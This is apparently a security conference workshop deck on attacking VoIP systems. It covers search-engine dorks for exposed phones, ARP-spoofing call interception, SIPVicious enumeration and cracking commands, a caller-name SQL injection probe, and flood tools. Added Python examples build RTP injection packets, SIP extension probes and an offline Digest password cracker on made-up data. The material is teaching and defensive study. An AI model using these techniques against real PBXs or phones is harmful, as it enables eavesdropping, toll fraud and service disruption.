VOIP insecurities workshop (Positive Hack Days, Gritsai)

"I just called to say I pwn you
I just called to say how much I care
I just called to say I own you
And I mean it from the bottom of my heart"
(after Stevie Wonder)

Agenda
- VOIP: PSTN and VOIP, PSTN vs. VOIP, VOIP protocols, VOIP security
- Attacking VOIP: enumerating VOIP devices, RTP attacks (with demonstration), SIP attacks (with practice)
- Further reading
PSTN / Public Switched Telephone Network
VOIP / Voice over Internet Protocol
PSTN vs. VOIP
- Network: the PSTN is a closed network; VOIP runs over a public network (the Internet)
- End-user devices: PSTN phones are simple devices; VOIP endpoints are complex devices (an operating system, a web interface, several network services)
- Authentication: the PSTN has no mobility, so the subscriber is authenticated by the wire; VOIP endpoints are mobile and must authenticate over the network

VOIP protocols
- Signaling protocols set up, modify and tear down calls
- Media protocols carry the audio
- Call control and the media stream travel on separate paths, often through different hosts, so each has to be protected on its own
VOIP protocols: signaling (short overview)
- SIP: Session Initiation Protocol (RFC 3261)
- SDP: Session Description Protocol, carried in SIP message bodies to describe the media (addresses, ports, codecs)
- H.323
- MGCP: Media Gateway Control Protocol
- SCCP: Skinny Client Control Protocol (Cisco)
- RTCP: Real-time Transport Control Protocol, the control companion of RTP rather than a call-signaling protocol

VOIP protocols: media and hybrid (short overview)
- Media: RTP / SRTP
- Hybrid (signaling and media in one protocol): IAX / IAX2
VOIP insecurities
- Confidentiality: eavesdropping, recording, ...
- Availability: DoS, buffer overflows, ...
- Authentication: registration hijacking, Caller ID spoofing, ...
- Fraud: toll fraud, data masquerading, ...
- SPIT (SPAM over IP Telephony): voice phishing, unsolicited calling, ...

VOIP insecurities: topics for today
- Enumeration of VOIP devices: search engines, port scanning
- RTP: eavesdropping / recording calls, inserting data into the media stream, DoS
- SIP: searching for extensions, caller name spoofing, DoS
Enumerating VOIP devices: Google hacking
- Google hacking / GHDB: take strings from the device's user manual (page titles, URL paths) and turn them into queries
- Operators: inurl:, intitle:, and site:<Customer> to restrict the search to the target's domain!
- Examples:
  Asterisk Management Portal: intitle:asterisk.management.portal web-access
  Cisco phones: inurl:"NetworkConfiguration" cisco
  Cisco CallManager: inurl:"ccmuser/logon.asp"
  D-Link phones: intitle:"D-Link DPH" "web login setting"
  Grandstream phones: intitle:"Grandstream Device Configuration" password
  Linksys (Sipura) phones: intitle:"SPA Configuration"
  Polycom SoundPoint phones: intitle:"SoundPoint IP Configuration"
Enumerating VOIP devices: Shodan
- www.shodanhq.com: search by domain name, IP address, port
- Banner grabbing; example from the workshop: Snom phones with no password set

Enumerating VOIP devices: scanners
- VOIP scanners: smap, svmap (SIPVicious)
- Fyodor's nmap: nmap -sU for UDP scanning
- Common problems with UDP scanning: it is slow, and a port that never answers is reported as open|filtered, so confirm SIP ports with an OPTIONS probe (svmap)
Enumerating VOIP devices: common ports
- VOIP protocols: 5060-5070 (SIP; 5060 UDP/TCP, 5061 SIP over TLS), 1718-1720 (H.323; 1719 RAS, 1720 H.225 call signaling), 2517, UDP 2427/2727 (MGCP), TCP 2000 (SCCP), UDP 4569 (IAX2), ...
- RTP ports are allocated dynamically and negotiated in SDP
- Management protocols: TCP 21-23, 80, 443, 8088, ...; UDP 161, 162 (SNMP), 69 (TFTP, from which phones fetch their configuration), ...
- IANA (Internet Assigned Numbers Authority): grep <vendor> in www.iana.org/assignments/port-numbers
RTP / Real-time Transport Protocol
- RFC 1889 (1996), obsoleted by RFC 3550 (2003)
- Media over IP/UDP
- Sequence numbers allow packet reordering and loss detection; there is no retransmission
- Used with the signaling protocols (SIP, H.323, MGCP), which negotiate the ports and codecs
- RTCP (Real-time Transport Control Protocol) carries reception statistics and sender reports
- RTCP port = RTP port + 1 by convention (unless the SDP overrides it with an a=rtcp attribute)

RTP attacks
- Call interception: attack at layer 2 or 3 (ARP spoofing, routing), then decode the intercepted data
- Injection into a call: find the RTP port, then inject into the media stream
- Denial of service: RTP flood

RTP attacks: call interception
- ARP spoofing: Cain & Abel, ettercap, arpspoof (dsniff)
- Wireshark: Telephony -> VoIP Calls reassembles the captured RTP streams and plays them back
- Demo

RTP attacks: injection, synchronization fields in the RTP header
- sequence number: position in the media stream, +1 per packet
- timestamp: sampling instant of the packet's first sample; increases by the number of samples per packet (160 for G.711 at 8 kHz with 20 ms packets), not by 1
- SSRC: identifies the source; a constant random 32-bit value for the whole session
- payload type: the codec in use (0 = PCMU, 8 = PCMA, ...)

RTP attacks: injection, why it works
- Unencrypted: SRTP is rarely deployed because of debugging needs, QoS concerns and key distribution
- UDP is connectionless: there is no session to hijack, anyone who can reach the port can send packets
- Data requirements: the victim's SSRC; sequence number and timestamp monotonically increasing and ahead of the legitimate sender, so the receiver plays the injected packets and discards the real ones as late; if they are unknown, fuzz the timestamp and sequence number

RTP attacks: injection, finding the RTP port and injecting
- Finding the RTP port: intercept the SDP (c= and m= lines in the INVITE / 200 OK) or port scan
- Media injection requirements: sampling frequency and codec must match the stream
- Demo: SDP or nmap to find the port, then rtpinsertsound (does not work 100% of the time)
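The bookkeeping behind the injection slides above (find the RTP port in the SDP, read the intercepted packet's header, then produce packets with the same SSRC and payload type, sequence number +1 and timestamp advanced by one frame), as an added Python example that is not part of the workshop material. The SDP body, the "intercepted" packet, the SSRC and the 192.0.2.x addresses are constructed sample data; the example does no network I/O.

```python
"""RTP injection bookkeeping (added example, not from the workshop slides)."""
import re
import struct

# Constructed SDP body as carried in a SIP INVITE / 200 OK (RFC 5737 documentation address).
SAMPLE_SDP = (
    "v=0\r\n"
    "o=alice 2890844526 2890844526 IN IP4 192.0.2.10\r\n"
    "s=-\r\n"
    "c=IN IP4 192.0.2.10\r\n"
    "t=0 0\r\n"
    "m=audio 10000 RTP/AVP 0 8 101\r\n"
    "a=rtpmap:0 PCMU/8000\r\n"
    "a=rtpmap:8 PCMA/8000\r\n"
    "a=rtpmap:101 telephone-event/8000\r\n"
)

# Static payload types with their implied clock rate (RFC 3551); others come from a=rtpmap.
STATIC_PT = {0: ("PCMU", 8000), 8: ("PCMA", 8000), 18: ("G729", 8000)}


def parse_sdp_audio(sdp):
    """Return (media_ip, rtp_port, rtcp_port, {payload_type: (codec, clock_rate)})."""
    ip = re.search(r"^c=IN IP4 (\S+)", sdp, re.M).group(1)
    m = re.search(r"^m=audio (\d+) RTP/AVP ((?:\d+ ?)+)", sdp, re.M)
    rtp_port = int(m.group(1))
    codecs = {int(pt): (name, int(rate))
              for pt, name, rate in re.findall(r"^a=rtpmap:(\d+) ([^/]+)/(\d+)", sdp, re.M)}
    for pt in (int(p) for p in m.group(2).split()):
        codecs.setdefault(pt, STATIC_PT.get(pt, ("unknown", 0)))
    # RFC 3550 default: RTCP on the next higher port, unless a=rtcp: (RFC 3605) says otherwise.
    rtcp = re.search(r"^a=rtcp:(\d+)", sdp, re.M)
    rtcp_port = int(rtcp.group(1)) if rtcp else rtp_port + 1
    return ip, rtp_port, rtcp_port, codecs


RTP_HDR = struct.Struct("!BBHII")   # V/P/X/CC, M/PT, sequence number, timestamp, SSRC


def parse_rtp(packet):
    """Decode the fixed 12-byte RTP header; payload starts after any CSRC list."""
    b0, b1, seq, ts, ssrc = RTP_HDR.unpack_from(packet)
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    cc = b0 & 0x0F
    return {"marker": bool(b1 & 0x80), "payload_type": b1 & 0x7F, "seq": seq,
            "timestamp": ts, "ssrc": ssrc, "payload": packet[RTP_HDR.size + 4 * cc:]}


def build_rtp(payload_type, seq, timestamp, ssrc, payload, marker=False):
    """Encode an RTP packet: V=2, no padding, no extension, no CSRCs."""
    b1 = (0x80 if marker else 0) | (payload_type & 0x7F)
    return RTP_HDR.pack(0x80, b1, seq & 0xFFFF, timestamp & 0xFFFFFFFF,
                        ssrc & 0xFFFFFFFF) + payload


def next_injected_packets(last_seen, frames, clock_rate, ptime_ms=20):
    """Packets that continue the stream `last_seen` belongs to.

    The receiver keeps the highest sequence number seen and drops older packets, so
    injected frames must run ahead of the legitimate sender: same SSRC and payload
    type, seq +1 per packet, timestamp += samples per packet. A phone that treats a
    sequence jump as a new stream may resync on the real sender instead, which is a
    likely reason the injection demo in the slides does not work against every device.
    """
    last = parse_rtp(last_seen)
    step = clock_rate * ptime_ms // 1000        # 160 samples for 8 kHz / 20 ms (PCMU, PCMA)
    seq, ts, out = last["seq"], last["timestamp"], []
    for frame in frames:
        seq = (seq + 1) & 0xFFFF                # 16-bit wrap
        ts = (ts + step) & 0xFFFFFFFF           # 32-bit wrap
        out.append(build_rtp(last["payload_type"], seq, ts, last["ssrc"], frame))
    return out


if __name__ == "__main__":
    ip, rtp_port, rtcp_port, codecs = parse_sdp_audio(SAMPLE_SDP)
    print(f"media {ip}:{rtp_port} (RTCP {rtcp_port}) codecs {codecs}")
    # Constructed "intercepted" packet: PCMU (PT 0), 160 bytes of u-law silence, made-up SSRC.
    seen = build_rtp(0, 1000, 160000, 0xDEADBEEF, b"\xff" * 160)
    for p in next_injected_packets(seen, [b"\xff" * 160] * 3, codecs[0][1]):
        h = parse_rtp(p)
        print(f"seq={h['seq']} ts={h['timestamp']} ssrc={h['ssrc']:08x} pt={h['payload_type']}")
```

The codec and clock rate come from the SDP rather than being guessed, which is the "sampling frequency and codec must match" requirement from the slide; sending the packets is a plain UDP sendto to the media IP and RTP port, which is left out here.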
RTP attacks: denial of service
- Flood: low bandwidth requirements for the attacker, but a media stream is a high load for the phone that has to decode it
- Authentication exists only at the SIP level; and again, UDP is connectionless, so RTP packets are accepted from anyone
- Demo: rtpflood
SIP / Session Initiation Protocol
- Application-layer protocol over TCP or UDP (also TLS)
- ASCII text; a SIP header looks much like an e-mail (or HTTP) header
- Addresses are URIs: sip:user@host

SIP components
- UA (User Agent), Proxy, Registrar, Redirect server
- Diagrams: call via a proxy; call via a redirect server

SIP attacks
- Using somebody else's PBX: extension enumeration, brute-forcing extension passwords
- Caller name spoofing
- Registration hijacking
- Denial of service: busy lines

SIP requests
- INVITE: indicates that a client is being invited to participate in a call session
- BYE: terminates a call; can be sent by either the caller or the callee
- OPTIONS: queries the capabilities of a server (or user agent)
- REGISTER: registers the contact address for the address-of-record in the To header field with a SIP registrar
- ACK: confirms that the client has received a final response to an INVITE request
- CANCEL: cancels any pending request
- more ...

SIP responses
- 1xx Informational (100 Trying, 180 Ringing)
- 2xx Successful (200 OK, 202 Accepted)
- 3xx Redirection (302 Moved Temporarily)
- 4xx Request Failure (404 Not Found, 482 Loop Detected)
- 5xx Server Failure (501 Not Implemented)
- 6xx Global Failure (603 Decline)

Basic SIP call (diagram)

SIP attacks: using somebody else's PBX
- Extension enumeration, brute-forcing passwords, making a call
- Practice with SIPVicious:
  svmap <ip>
  svwar -e <extensions> <ip> -m <REQUEST>
  svcrack -u <extension> -d <dictionary> <ip>
- Then set up a softphone with the recovered credentials
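The request format, response classes and enumeration logic from the SIP slides, as an added Python example that is not part of the workshop: build_request produces a minimal RFC 3261 request of the kind svwar sends, parse_response reads the status line and headers, and classify turns the status code into the verdict svwar prints for each probed extension. The PBX answers are constructed sample responses served by fake_probe, and the 192.0.2.x addresses are documentation addresses, so nothing is sent on the network.

```python
"""SIP extension enumeration logic (added example, not from the workshop slides)."""
import re
import secrets


def build_request(method, ext, pbx, src_ip="192.0.2.50", src_port=5060, display_name="test"):
    """Minimal SIP request with the mandatory headers (Via, From, To, Call-ID, CSeq, Max-Forwards)."""
    branch = "z9hG4bK" + secrets.token_hex(6)          # RFC 3261 branch magic cookie
    uri = f"sip:{ext}@{pbx}"
    lines = [
        f"{method} {uri} SIP/2.0",
        f"Via: SIP/2.0/UDP {src_ip}:{src_port};branch={branch};rport",
        f'From: "{display_name}" <sip:{ext}@{pbx}>;tag={secrets.token_hex(4)}',
        f"To: <{uri}>",
        f"Call-ID: {secrets.token_hex(8)}@{src_ip}",
        f"CSeq: 1 {method}",
        f"Contact: <sip:{ext}@{src_ip}:{src_port}>",
        "Max-Forwards: 70",
        "Content-Length: 0",
        "",
    ]
    return "\r\n".join(lines) + "\r\n"               # empty line terminates the headers


def parse_response(raw):
    """Return (status_code, reason, headers as a lower-cased dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *hdr_lines = head.split("\r\n")
    m = re.match(r"SIP/2\.0 (\d{3}) (.*)", status_line)
    if not m:
        raise ValueError("not a SIP response: " + status_line)
    headers = {}
    for line in hdr_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(m.group(1)), m.group(2), headers, body


def classify(code):
    """What a status code says about the probed extension (the svwar decision)."""
    if code in (401, 407):
        return "exists, authentication required"
    if code == 200:
        return "exists, no authentication"
    if code in (480, 486, 600):                        # INVITE reached a real, busy/unavailable phone
        return "exists, phone unavailable or busy"
    if code == 404:
        return "unknown extension"
    return "unclear"                                   # e.g. 403 from a PBX that rejects everything alike


def enumerate_extensions(probe, exts):
    """probe(ext) -> raw response text; returns {ext: verdict} for extensions that look real.

    This only works when the PBX answers differently for known and unknown extensions;
    Asterisk's alwaysauthreject=yes sends the same 401 for both and defeats it.
    """
    found = {}
    for ext in (str(e) for e in exts):
        code, *_ = parse_response(probe(ext))
        verdict = classify(code)
        if verdict.startswith("exists"):
            found[ext] = verdict
    return found


def _resp(code, reason, extra=""):
    """Constructed response text standing in for the PBX."""
    return (f"SIP/2.0 {code} {reason}\r\n"
            f"Via: SIP/2.0/UDP 192.0.2.50:5060;branch=z9hG4bK1;rport\r\n"
            f"{extra}Content-Length: 0\r\n\r\n")


FAKE_PBX = {
    "1001": _resp(401, "Unauthorized",
                  'WWW-Authenticate: Digest realm="asterisk", nonce="1a2b3c"\r\n'),
    "1005": _resp(200, "OK"),
    "1007": _resp(486, "Busy Here"),
}


def fake_probe(ext):
    """Simulated PBX: three real extensions, 404 for everything else."""
    return FAKE_PBX.get(ext, _resp(404, "Not Found"))


if __name__ == "__main__":
    print(build_request("OPTIONS", "1001", "192.0.2.1"))
    for ext, verdict in enumerate_extensions(fake_probe, range(1000, 1010)).items():
        print(ext, verdict)
```

With a real target, probe would send the text from build_request over UDP to port 5060 and return the reply; the method matters because a PBX may answer REGISTER, OPTIONS and INVITE differently for the same extension, which is why svwar takes -m.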
SIP attacks: caller name spoofing
- The caller name shown to the callee is just the display name in the From header, and any softphone lets you set it
- Practice with the X-Lite softphone:
  Display name: ' 1=1 --   (the slide uses an SQL injection probe as the name: whatever stores it, such as call records or billing, may be injectable)
  Domain: IP address of the target UA (direct call, no PBX in between)
  Register: disabled

SIP attacks: registration hijacking
- An INVITE to the PBX makes it look the callee up in the registrar; the registration is whatever was sent in the Contact header, i.e. an IP address
- Anyone who can REGISTER as that user (no or weak authentication) replaces the Contact with their own address and receives the user's calls
- Practice with X-Lite: register settings, re-registration rate

SIP attacks: denial of service
- Without authentication: -> INVITE, <- 100 Trying ..., <- 486 Busy Here; every INVITE occupies a line
- With HTTP Digest: the server still has to answer every INVITE with a challenge, generating and storing a nonce for each one
- Practice: inviteflood
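The Digest step that both the svcrack practice and the DoS slide above depend on, as an added Python example that is not part of the workshop: digest_response is the MD5 computation of RFC 3261 section 22 (RFC 2617) that a phone performs to answer a 401/407 challenge, and crack_captured runs the same computation over candidate passwords against one captured REGISTER exchange, which is what svcrack does online against the registrar. The realm, nonce, extension 1001, password and 192.0.2.1 are made up for the example.

```python
"""SIP Digest authentication and offline dictionary check (added example, not from the slides)."""
import hashlib
import re


def _md5(s):
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """response = MD5(HA1:nonce:HA2), or the qop=auth variant with nc and cnonce."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    if qop == "auth":
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def parse_digest_params(value):
    """'Digest realm="x", nonce="y", algorithm=MD5' -> {'realm': 'x', 'nonce': 'y', ...}"""
    scheme, _, params = value.strip().partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest header")
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|[^,\s]+)', params)}


def build_authorization(username, password, method, uri, www_authenticate):
    """Authorization header value a phone sends in reply to a WWW-Authenticate challenge."""
    p = parse_digest_params(www_authenticate)
    resp = digest_response(username, p["realm"], password, method, uri, p["nonce"])
    return (f'Digest username="{username}", realm="{p["realm"]}", nonce="{p["nonce"]}", '
            f'uri="{uri}", response="{resp}", algorithm=MD5')


def crack_captured(authorization, method, candidates):
    """Offline dictionary check of a sniffed Authorization header; returns the password or None.

    One captured REGISTER (for instance via the ARP spoofing used for call interception)
    is enough: username, realm, nonce and uri are all in the header, so every candidate
    can be tested without sending anything to the PBX.
    """
    p = parse_digest_params(authorization)
    for pw in candidates:
        r = digest_response(p["username"], p["realm"], pw, method, p["uri"], p["nonce"],
                            p.get("qop"), p.get("nc"), p.get("cnonce"))
        if r == p["response"]:
            return pw
    return None


# Constructed exchange: registrar challenge, then the phone's answer using password "1234".
CHALLENGE = 'Digest realm="asterisk", nonce="4f2b1a3c9d8e", algorithm=MD5'
REGISTER_URI = "sip:192.0.2.1"
CAPTURED = build_authorization("1001", "1234", "REGISTER", REGISTER_URI, CHALLENGE)

if __name__ == "__main__":
    print("Authorization:", CAPTURED)
    print("cracked:", crack_captured(CAPTURED, "REGISTER", ["0000", "1111", "1001", "1234"]))
```

The method is part of HA2, so a response captured from a REGISTER cannot be replayed as an INVITE, but it is still a plain MD5 of a short numeric password, which is why the slides can brute-force extensions with a dictionary. On the registrar side the nonce in the challenge has to be generated and remembered for every request it challenges, which is the per-INVITE cost the DoS slide refers to; SIP over TLS keeps the hash off the wire in the first place.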
Further reading
- Set up a lab: http://enablesecurity.com/resources/how-to-set-up-a-voip-lab-on-a-shoe-string/
- Read and practice: Hacking Exposed VoIP: Voice Over IP Security Secrets & Solutions
- Advanced attacks: "Having fun with RTP" by kapejod; "SIP home gateways under fire"
- Fuzzing

Q&A
ggritsai@ptsecurity.ru

Positive Hack Days. Gritsai. VOIP insecurities workshop
